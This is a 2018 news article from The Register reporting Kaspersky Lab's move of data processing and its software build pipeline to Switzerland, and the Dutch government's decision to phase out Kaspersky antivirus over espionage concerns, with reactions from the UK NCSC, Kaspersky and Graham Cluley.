Kaspersky Lab’s move from Russia to Switzerland fails to save it from Dutch oven

It has been a busy few days for beleaguered antivirus-flinger Kaspersky Lab. Today’s confirmation of an infrastructure move to Switzerland comes hot on the heels of a comment from the Netherlands government that use of the Russian firm’s software is a bit risky.

Kaspersky is moving a number of its core processes from Russia to Switzerland as part of its “Global Transparency Initiative” (aka “Please stop being horrid about our Russian connections”).

The security outfit plans to open a data centre in Zurich by the end of 2019 which will store information on users in countries such as Europe, North America and Australia.

Before the end of 2018, Kaspersky Lab will have also shifted its “software build conveyor”, a set of tools that assembles the applications, and plans to sign its threat detection rule databases with a digital signature in Switzerland.

Transparent, like Swiss mountain water

The, er, Russian security biz also intends to use an independent third party to conduct technical code reviews and make the source code available for review by “responsible stakeholders”.

The Register contacted Kaspersky for a definition of the term, but has yet to receive a response.

Eugene Kaspersky, CEO of the eponymous software maker, said:

In a rapidly changing industry such as ours we have to adapt to the evolving needs of our clients, stakeholders and partners. Transparency is one such need, and that is why we’ve decided to redesign our infrastructure and move our data processing facilities to Switzerland. We believe such action will become a global trend for cybersecurity, and that a policy of trust will catch on across the industry as a key basic requirement.

Meanwhile, GCHQ offshoot the National Cyber Security Centre, which last year effectively banned the use of Russian antivirus products from government departments said of the Kaspersky Labs announcement:

Whilst this does not currently change our advice on systems with a national security purpose we welcome this move. This is a move in the right direction to potentially address risks to wider UK organisations and the public.

Our conversations with Kaspersky continue and this move will be discussed as part of our ongoing dialogue.

With action under way in the US to remove Kaspersky software from government PCs, the current NCSC block on the use of its AV on systems processing information classified SECRET still in place in the UK, and Twitter turning its nose up at the firm’s ad money, the vendor is hoping that a caring, transparent image might waft away the lingering odour of Russian interference.

Dutch heat

But that may be a little too late for the government of the Netherlands. Justice Minister Ferdinand Grapperhaus has issued a letter with stern words for the Russian outfit.

In it he warned the Russian Federation has an active offensive cyber programme focused on Dutch interests and pointed out that Kaspersky is a Russian company, headquartered in Russia and so subject to Russian legislation. He said, “as a precautionary measure, [the use of] Kaspersky antivirus software [in] the national government will be phased out.”

The Dutch Cabinet feels that there is a risk of espionage through the use of Kaspersky’s products and so recommended the software is not used (aligning with the US and UK), although the even-handed politicos also pointed out that there are no concrete cases of abuse in the Netherlands.

A spokesperson from Kaspersky Lab told The Register:

Kaspersky Lab is very disappointed with this decision by the Dutch Government based on theoretical concerns… But yet again, Kaspersky Lab is caught up in a geopolitical fight and still no credible evidence of wrongdoing has been publicly presented by anyone or any organisation to justify such decisions.

Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage or offensive cyber efforts, and it’s disconcerting that a private company can be treated as guilty merely due to geopolitical issues.

Graham Cluley, an infosec watcher, agreed that it was all rather unfortunate and perhaps a little unfair on the software maker, telling The Register:

I can’t help but feel sorry for Kaspersky. A reputation built up over 20 years has been damaged by rumours, without their accusers even having to make any evidence of wrongdoing public. I don’t know how or if they can successfully convince everyone that they can be trusted, but shifting their core infrastructure to Switzerland certainly won’t do them any harm at all.

As the US imposes hefty sanctions on a number of Russian businesses, keeping Kaspersky Lab headquartered in the Russian Federation may still be a pill too bitter to swallow for Western governments. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/15/kaspersky_labs_announces_move_to_zurich_dutch_government_questions_firm/